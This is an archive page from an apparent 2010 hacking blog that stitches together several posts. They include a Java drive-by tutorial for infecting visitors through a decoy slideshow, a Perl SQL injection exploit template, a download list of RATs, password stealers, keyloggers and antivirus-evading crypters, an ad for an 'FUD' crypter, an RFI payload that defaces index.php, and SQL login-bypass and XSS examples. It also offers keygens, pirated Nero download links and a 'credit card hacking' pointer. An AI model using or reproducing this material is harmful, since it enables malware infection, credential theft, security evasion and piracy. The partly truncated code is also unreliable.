Home » Archives for July 2010
Black Hat: The Largest Hacker Conference 2010 Best 5 Takeaways
..................................................................................................................

XSSer Storm - Open Source Penetration testing tool
...............................................................................................

Download Free Keygen & Serial keys for all EA Games
.................................................................................................

Free Kaspersky Activation Key: Kaspersky All version Activation Key
......................................................................................................

The New Java Drive-By - Now supports .jpg, .gif, and .png!
.............................................................................................
Notes
Introduction
Welcome to my new Java Drive-By! This drive by will allow you to be "legit". What do I mean by legit? Well I mean that if you say "Come look at my sexy slideshow! *link to site*". They will go there and see a slideshow and go, okay! Now you have infected them, but are still playing with them. Good luck and please read this full post,
What You Need
Before we get started you will need to get Java JDK to compile your .java. You will also need some pics of a hot ass girl, which can be found anywhere on the internet today. You will also need these files (all available here):
Update.java (Client) -
This is the main thing that will transfer your virus to their computer.
Slide.java (Slideshow) -
The slideshow will be the one to make you seem "legit".
maker.bat (Makes .jar & sig) -
Maker.bat will conver the .java -> .class -> .jar & sig. This is ment to make your life easier.
index.html (Main Page) -
When they visit your site this is what they will see. This html file is the key to putting it all togethor.
Java Error
Quote:'javac' is not recognized as an internal or external command, operable program or batch file.
Easy fix. If you haven't already, download Java JDK. Once you have it installed follow the step provided below.
Step 1 - Go to Start > Control Panel > System > Advanced tab > Environment Variables > System variables > Path > Edit.
Step 2 - Add a ; at the very end followed by C:\Program Files\Java\JDK VERSION\bin.
Step 3 - Done. Now try it again.
FAQ
Q. Wont let me type, must be something wrong with the JDK I downloaded?
A. Just type the password, it wont show you typing it. It will just sit there blinking, it's okay just type the password. If you can't get the password right try 123456.

How to use SQL Injection? Best Online Tutorial for SQL Injection
...........................................................................................................................
here we get no error.

Recover Free RAR Password: RAR Password Recovery Magic
..............................................................................................

Free Premium RapidShare account | Hack Rapidshare: Rapidshare Hacking

credit card hacking
http://www.fakenamegenerator.com/gen-random-us-ca.php

Writing SQL Injection exploits in Perl
.................................................................................................................
[1] Introduction
[2] Little panning of Perl language used into an internet context
[3] Perl SQL Injection by examples
[4] Gr33tz to all new and former visitors and …
—+— StArT
[1] Introduction
Perl can be considered a very powerfull programming language in we think to the internet context. Infact we can make a lot
of operation across the internet just writing a litlle bit of code. So i decided to write a similar guide to make an
easiest life to everyone who decide to start writing a perl exploit.
There are few requisites u need to proceed:
- U must know the basics operation of perl (print, chomp, while, die, if, etc etc…);
- U must know what kind of SQL code u need to inject to obtain a specific thing (stealing pwd, add new admin, etc etc…).
Now, we are ready to start…
[2] Little panning of Perl language used into an internet context
Using a Perl code into an internet context means that u should be able to make a sort of dialog between your script and the
server side (or other..). To make this u need to use some “Perl modules”.
Those modules must be put on the head of the script. In this tut we are going to use only the “IO::Socket” module, but
there are thousand and if u are curious just search on cpan to retrieve info on every module.
[-] Using the IO::Socket module
Using this module is quite simple. To make the Perl Interpreter able to use this module u must write on the starting
of the script “use IO::Socket”. With this module u’ll be able to connect to every server defined previously, using
a chomp, look at the example.
Example:
print “Insert the host to connect: “;
chomp ($host=
Now suppose that the host inserted is www.host.com. We must declare to the interpreter that we want to connect to this
host. To do this, we must create a new sock that will be used by the interpreter to connect.
To create this we are going to write something like this:
$sock = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$host”, PeerPort=>”80″)
or die ” ]+[ Connecting ... Can't connect to host.nn";
In this piece of code we have declared that the interpreter must use the "IO::Socket" module, creating a new
connection, through the TCP protocol, using the port 80 and direct to the host specified in the chomp
($host=www.fbi.gov).
If connection is not possible an error message will appear ("Connecting ... Can't connect to host").
Resume:
- Proto=>TCP -------> The protocol to use (TCP/UDP)
- PeerAddr=> -------> The server/host to connect
- PeerPort=> -------> Port to use for the connection
Ok, now let's go to the next step, which is the real hearth of this tut.
[3] Perl SQL Injection
Assuming that we know what kind of SQL statement must inject, now we are going to see how to do this.
The SQL code must be treaty like a normal variable (like “$injection”).
Example:
$injection=index.php/forum?=[SQL_CODE]
This string means that we are going to inject the query into “index.php/forum” path, following the correct syntax that
will bring us to cause a SQL Injection “?=”.
Now we must create a piece of code that will go to inject this query into the host vuln.
print $sock “GET $injection HTTP/1.1n”;
print $sock “Accept: */*n”;
print $sock “User-Agent: Hackern”;
print $sock “Host: $hostn”;
print $sock “Connection: closenn”;
This piece of code is the most important one into the building of an exploit.
It can be considered the “validation” of the connection.
In this case the “print” command doesn’t show anything on screen, but it creates a dialogue and sends commands to the host.
In the first line the script will send a “GET” to the selected page defined into “$injection”.
In the third line it tells to the host “who/what” is making the request of “GET”. In this case this is Hacker, but it
can be “Mozilla/5.0 Firefox/1.0.4″ or other.
In the fourth line it defines the host to connect to, “$host”.
With the execution of this script we have made our injection.
Resume of the exploit:
use IO::Socket
print “Insert the host to connect: “;
chomp ($host=
$sock = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$host”, PeerPort=>”80″)
or die ” ]+[ Connecting ... Can't connect to host.nn";
$injection=index.php/forum?=[SQL_CODE]
print $sock “GET $injection HTTP/1.1n”;
print $sock “Accept: */*n”;
print $sock “User-Agent: Hackern”;
print $sock “Host: $hostn”;
print $sock “Connection: closenn”;
close ($sock); #this line terminates the connection
A little trick:
Assuming that, with the execution of SQL Inj, u want to retrieve a MD5 Hash PWD, u must be able to recognize it.
Additionally, u want that your script will show the PWD on your screen.
Well, to make this, the next piece of code, could be one of the possible solutions.
while($answer = <$sock>) {
if ($answer =~ /([0-9a-f]{32})/) {
print “]+[ Found! The hash is: $1n”;
exit(); }
This string means that if the answer of the host will show a “word” made by 32 characters (”0″ to “9″ and “a” to “f”),
this word must be considered the MD5 Hash PWD and it must be showed on screen.
Conclusions:
The method showed in this tut is only one of the 10000 existing, but, for me, this is the most complete one.
U could use also the module “LWP::Simple” in the place of “IO::Socket”, but u should change something into the code.
This method can be used also, not only for SQL Injection, but, for example, remote file upload or other.

[Download] The Hacker's Kit [Tools, Rats, Keyloggers, Stealers, Scanners]♣
My Personnal Compilation
Batch
- DELmE's Batch Virus Generator v 2.0
- Power Of Batch [Text File]
Binders
- Bl0b B!nder 0.2.0 + USG
- BlackHole Binder
- F.B.I. Binder
- Predator 1.6
- PureBiND3R by d3will
- Schniedelwutz Binder 1.0
- Simple Binder by Stonedinfect
- sp1r1tus Binder 1.0
- Tool-Store Binder 1.0
- Tool-Store Toasty Binder 1.0
- Yet Another Binder 2.0
- Others
Crypters
- Bifrost Crypter by ArexX 2
- Cryptable Seduction 1.0 by DizzY
- Crypter by Permabatt
- Crypter bY YoDa
- Cryptic 1.5
- Daemon Crypt 2 Public
- Deception 4 by [RaGe] [Favorite :D]
- Destructor Crypter
- EXECrypt 1 M0d by CARDX
- Fuzz Buzz 1.2 by BulletProof
- OSC-Crypter by haZl0oh M0d
- Poison Ivy Crypt M0d by CARDX
- SaW V1 Mod by LEGIONPR
- Skorpien007 Crypter 3.1
- Stonedinfect Crypter 1.0
- Trojka Crypter 1.1 by tr1p0d
Keyloggers
- Ardamax 2.8
- Ardamax 2.41
Nukers And Fl00ders
- Ass4ult
- B4ttl3 P0ng
- Click v2.2
- Fortune
- ICMP Fl00d
- Panther Mode 1 & 2
- Rocket v1.0
- RPC Nuke
Port & IP Scanners
- Advanced IP Scanner
- Advanced Port Scanner
- Bitching Threads
- BluePortScan
- LanSpy
- NeoTracePro
- NetScanTools
- ProPort
- Putty v0.6
- SuperScan
- Trojan Hunter 15
- ZenMap - Nmap v5.21 [Win]
R.A.T.s
- Apocalypse 1.4.4
- Aryan v0.5
- Bandook RAT 1.35
- Bifrost 1.2.1d
- Cerberus 1.03.4
- All Cybergates from v1.01.8 to v1.04.8
- DarkComet 2 RC3
- Lost Door 4.0 Pro
- MeTuS-Delphi-2.8
- Nuclear RAT 2.1.0
- Optix v1.33
- Poison Ivy 2.3.2
- ProRat 1.9 SE
- SharK 3
- Spy-Net v2.6
- SubSeven 2.3
- Turkojan 4 Gold
Sniffers
- Cain & Abel Self Installer [WinXP]
- WireShark Self-Installer [Win32]
Stealers
- 1337 SteamACC Stealer Private
- Allround Stealer
- Armageddon Stealer 1.0 by Krusty
- bl0b Recovery 1.0
- Blade Stealer 1.0 PUBLIC
- Codesoft PW Stealer 0.35
- Codesoft PW Stealer 0.50
- Dark Screen Stealer 2
- Dimension Stealer 2 by Gumball
- FileZilla Stealer 1.0 PUBLIC
- FileZilla Stealer by Stonedinfect
- Firefox Password Stealer - Steamcafe
- Fly Stealer 0.1
- Fudsonly Stealer 0.1
- Hackbase Steam Phisher 1.2 BETA
- spam 0.0.1.4
- spam Stealer
- HardCore Soft 0.0.0.1
- ICQ Steal0r
- IStealer 4.0
- IStealer 6.0 Legends
- LabStealer by Xash
- Multi Password Stealer 1.6
- Papst Steale.NET
- Pass Stealer 3.0
- Pesca Stealer 0.2
- pixel Stealer 1.3.0 SC
- pixel Stealer 1.4.0
- ProStealer
- Public Firefox 3 Stealer
- Pure-Steam 1.0 CS
- Pw Stealer by Killer110
- PWStealer 2.0
- Remote Penetration 2.2
- SC LiteStealer 1
- SimpleStealer 2.1
- SPS Stealer
- SStealer by till7
- Steam Stealer 1.0 by ghstoy
- Steam Stealer by till7
- Stupid Stealer 6 mit PHP Logger
- System Stealer 2
- The Simpsons Stealer 0.2
- Tool-Store FileZilla Stealer 1.0
- Ultimate Stealer 1.0
- Universal1337 - The Account Stealer
- Universal1337 2
- Universal1337 3
Vulnerability Scanner and Exploiter
- Atk ToolKit 4.1 [Src Code Included]
- Metasploit Framework V3.4.0 [Win]
- Nessus [Win32]
Website Exploit And SLQ Injections
- Admin Finder
- CGI-Bug Scanner
- Exploit Scanner
- ServerAttack
- SQL Helper
- Dork List [Text File]
- Dork [Text File]
- Master Google Hack List [Text File]
Others
- Bruteforcers
- Extra! [From VIP Vince Tool pack]
- ProxyBrowser
- Various Tools
- Much more

[FUD][FREE] Rattus Crypter v1.1 [ULTIMATE STUBS]-Cybergate,Spy-Net,RATS SUPPORT
Download Mirror #1 Download Mirror #2 Download Mirror #3 100% Undetected From ALL Anti-Virus Programs ScanTime FUD RunTime FUD 100% FUD 100% Undetected 100% Legit 100% Working with ALL RATS Stealers User/Pass Stealer CD Key Stealer Steam Stealer App Key Stealer Windows Key Stealer Spread P2P USB CD Forum Upload Network Miscellaneous Anti-System UAC Bypass Fake Error KeyLogger Add to Startup Downloader Hide in TaskManager Other SMTP Port Email support Icon changer ALL RATS Support And lots lots more. Anti-System AOL Active Virus Shield Avast! Free Antivirus Avast! Pro Antivirus and Internet Security AVG Anti-Virus AVG Anti-Virus Free Avira AntiVir Personal - Free Antivirus Avira AntiVir Premium AVZ BitDefender BitDefender Free Edition BullGuard CA Anti-Virus Clam AntiVirus ClamWin Comodo AntiVirus Dr. Web Dr. Web CureIt ESET F-Prot F-Secure Fortinet FortiClient End Point Security G DATA Software Graugon AntiVirus Immunet Protect Intego VirusBarrier Kaspersky Anti-Virus McAfee VirusScan Microsoft Security Essentials rman Panda Antivirus Panda Cloud Antivirus PC Tools AntiVirus PC Tools AntiVirus Free Edition Quick Heal AntiVirus Sophos Anti-Virus Symantec rton AntiVirus/rton 360 Trend Micro Internet Security Vba32Antivirus Sunbelt Software VIPRE Antivirus + Antispyware VirusBuster ZoneAlarm Antivirus INBATE AntiVirus ALL OTHER LEADING ANTI-VIRUS/ANTI-MALWARE PROGRAMS* [Video Tutorial On ] How To Bypass Sh.are.Cash ############################################## --------------------------------------------------------------------------- ........................................................................................................ |

Download ZoneAlarm Extreme Security 2010

Learn How to hack websites Using DNN [Dot Net Nuke] Exploit

Download Free Nero 9 All in one Pack 2010 Multilanguage Professional
...................................................................................................................................
Nero 9 All in one Pack 2010 Multilanguage | 780 MB
Simply Create, Rip, Burn, Copy, Share, Backup, Play, and Enjoy
Nero 9 is the next generation of the world’s most trusted integrated digital media and home entertainment software suite. It features new cutting-edge functionality that makes enjoying digital media content simple.
This easy-to-use yet powerful multimedia suite, gives you the freedom to create, rip, copy, burn, edit, share, and upload online. Whatever you want – music, video, photo, and data – enjoy and share with family and friends anytime, anywhere.
With easy-to-use Nero StartSmart command center, your digital life has never been more flexible, feasible, and fun.
Nero 9 - is a set of software digital media and home entertainment center the next generation, which is the most trusted in the world. It features new cutting-edge functionality that makes enjoying digital media content simple. This easy-to-use yet powerful multimedia suite, gives you the freedom to create, read, copy, record, edit, share and upload online. Whatever it was - music, video, photo, and data - enjoy and share with family and friends anytime, anywhere
Developer: Nero AG
Language: Multi (Russian is present)
Tabletka: Present
Compatibility with Vista: complete
System requirements:
* Required for installation DVD-ROM
* Windows ? XP SP2 or SP3, Windows Vista ?, Windows Vista ? with a package installed SP1 or SP2, Windows ? 7, Windows ? XP Media Center Edition 2005 SP2
* Windows ? XP and 64-bit version of Windows Vista ?, as well as 64-bit version of Windows ? 7 are supported in emulation mode 32-bit version of
* Nero DiscCopy Gadget works only in emulation mode 32-bit version in the sidebar Sidebar in 64-bit versions of Windows Vista ?, or Desktop Gadget in 64 versions of Windows ? 7.
* Windows ? Internet Explorer ? 6,0 or next version
* 1 GHz Intel ? Pentium ? III or equivalent AMD-processor and Intel ? (2 GHz Intel ? Pentium ? 4 or equivalent AMD and Intel ? processor forWindows Vista ?, Windows ? 7), 256 MB RAM (512 MB RAM for Windows Vista ?, Windows ? 7)
* 1,8 GB hard disk space for typical installation of all components
* Recordable or rewritable drive for burning CD-, DVD-or Blu-ray Disc
* DirectX ? 9,0 c revision 30 (August 2006) or the next version
* Up to 9 GB available hard disk space for DVD images and temporary DVD files
* Graphics card with at least 32 MB video memory and minimum resolution of 800 x 600 pixels and 16-bits color setting (recommended 24-bit or 32-bit)
* It is strongly recommended to install the latest WHQL-certified device drivers.
* For online services Nero: to register Nero, update, activation, service Gracenote ?, online backup Nero and other features (such as photo sharing) requires an Internet connection.
* Nero recommends a broadband connection (DSL-1000 and higher or Internet connection with equivalent performance) for all online services, Nero, such as Nero Online Backup and Nero Video Services
The collection:
- Nero 9.4.26.0
- Nero BackItUp & Burn 1.2.17b
- Nero Move it 1.5.10.0
- Nero MediaHome 4.4.26.3
- Templates
- Nero InCD 6.6.5100
- LightScribe Software
- Activation
- Help Files
- How to install.txt
DOWNLOAD
HotFile:
http://hotfile.com/dl/57762725/e4259e8/Nero9AIOpack2010.part01.rar.html
http://hotfile.com/dl/57762792/d4f8a01/Nero9AIOpack2010.part02.rar.html
http://hotfile.com/dl/57762857/69a92bb/Nero9AIOpack2010.part03.rar.html
http://hotfile.com/dl/57762930/6aa319c/Nero9AIOpack2010.part04.rar.html
http://hotfile.com/dl/57762999/599d1e8/Nero9AIOpack2010.part05.rar.html
http://hotfile.com/dl/57763044/59e6407/Nero9AIOpack2010.part06.rar.html
http://hotfile.com/dl/57763128/91dd014/Nero9AIOpack2010.part07.rar.html
http://hotfile.com/dl/57763209/e444d65/Nero9AIOpack2010.part08.rar.html
Fileserve:
http://www.fileserve.com/file/GuSmAtH
http://www.fileserve.com/file/BV7tgSH
http://www.fileserve.com/file/MaZWGTZ
http://www.fileserve.com/file/chk76tj
http://www.fileserve.com/file/EzQgSYt
http://www.fileserve.com/file/tseuqhT
http://www.fileserve.com/file/tC8QYwt
http://www.fileserve.com/file/XVgYFWu
Sharingmatrix:
http://sharingmatrix.com/file/14815645/Nero9AIOpack2010.part01.rar
http://sharingmatrix.com/file/14815659/Nero9AIOpack2010.part02.rar
http://sharingmatrix.com/file/14815673/Nero9AIOpack2010.part03.rar
http://sharingmatrix.com/file/14815681/Nero9AIOpack2010.part04.rar
http://sharingmatrix.com/file/14815705/Nero9AIOpack2010.part05.rar
http://sharingmatrix.com/file/14815731/Nero9AIOpack2010.part06.rar
http://sharingmatrix.com/file/14815739/Nero9AIOpack2010.part07.rar
http://sharingmatrix.com/file/14815747/Nero9AIOpack2010.part08.rar

What is XSS (Cross-Site Scripting)
$s = $_GET['search'];// a real search engine would do some database stuff
hereecho("You searched for $s. There were no results found");?>
For this, we test by throwing some HTML into the search engine, such as "XSS". If the site is vulnerable to XSS, you will see something like this: XSS, else, it's not vulnerable.
Example Exploit Code (Redirect)
Because we're mean, we want to redirect the victim to
goatse (don't look that up if you don't know what it is) by tricking them into clicking on a link pointed to "search.php?search=

What is RFI/LFI (Remote/Local File Include)
...........................................................................................................
Example Vulnerable Code - index.php (PHP)
$page = $_GET['p'];
if (isset($page)) {
include($page);
} else {
include("home.php");
}?>
Testing Inputs For Vulnerability
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't it's not vulnerable to RFI, but still may be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI.
Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server
unlink("index.php");system("echo Hacked > index.php");?>

What is SQL Injection?
SQL Injection
Here's an example of a vulnerable login code
$user = $_POST['u'];$pass = $_POST['p'];
if (!isset($user) || !isset($pass)) {
echo(");
} else {
$sql = "SELECT `IP` FROM `users` WHERE `username`='$user'
AND `password`='$pass'";
$ret = mysql_query($sql);
$ret = mysql_fetch_array($ret);
if ($ret[0] != "") {
echo("Welcome, $user.");
} else {
echo("Incorrect login details.");
}
}?>
Just throw an "'" into the inputs, and see if it outputs an error; if so, it's probably injectable. If it doesn't display anything, it might be injectable, and if it is, you will be dealing with blind SQL injection which anyone can tell you is no fun. Else, it's not injectable.
Let's say we know the admin's username is Administrator and we want into his account. Since the code doesn't filter our input, we can insert anything we want into the statement, and just let ourselves in. To do this, we would simply put "Administrator" in the username box, and "' OR 1=1--" into the password box; the resulting SQL query to be run against the database would be "SELECT `IP` FROM `users` WHERE `username`='Administrator' AND `password='' OR 1=1--'". Because of the "OR 1=1", it will have the ability to ignore the password requirement, because as we all know, the logic of "OR" only requires one question to result in true for it to succeed, and since 1 always equals 1, it works; the "--" is the 'comment out' character for SQL which means it ignores everything after it, otherwise the last "'" would ruin the syntax, and just cause the query to fail.
